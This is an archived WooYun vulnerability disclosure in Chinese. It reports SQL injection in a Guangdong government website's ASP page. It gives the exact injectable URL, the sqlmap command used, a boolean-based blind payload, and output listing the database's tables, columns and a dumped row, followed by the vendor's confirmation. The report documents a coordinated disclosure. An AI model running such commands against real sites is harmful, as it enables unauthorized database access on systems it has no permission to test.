当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093512

漏洞标题:广东省政府某站sql注入

相关厂商:广东省信息安全测评中心

漏洞作者: 路人甲

提交时间:2015-01-23 17:08

修复时间:2015-03-09 17:10

公开时间:2015-03-09 17:10

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-02-05: 细节向核心白帽子及相关领域专家公开
2015-02-15: 细节向普通白帽子公开
2015-02-25: 细节向实习白帽子公开
2015-03-09: 细节向公众公开

简要描述:

广东省政府某站sql注入

详细说明:

注入点 http://www.cyqhy.gov.cn/yeNewsInfo.asp?id=55


sqlmap -u http://www.cyqhy.gov.cn/yeNewsInfo.asp?id=55 --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:36:05
[13:36:06] [INFO] resuming back-end DBMS 'microsoft access'
[13:36:08] [INFO] testing connection to the target URL
[13:36:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=55 AND 8187=8187
---
[13:36:09] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


Database: Microsoft_Access_masterdb
[1 table]
+------+
| main |
+------+
Database: Microsoft_Access_masterdb
Table: main
[6 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| about | non-numeric |
| content | non-numeric |
| home | non-numeric |
| id | numeric |
| job | non-numeric |
| title | non-numeric |
+---------+-------------+
Database: Microsoft_Access_masterdb
Table: main
[1 entry]
+----+-----+------+-------+-------+---------+
| id | job | home | about | title | content |
+----+-----+------+-------+-------+---------+
| <blank> | 建 | <blank> | <blank> | <blank> | <blank> |
+----+-----+------+-------+-------+---------+

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-26 16:40

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无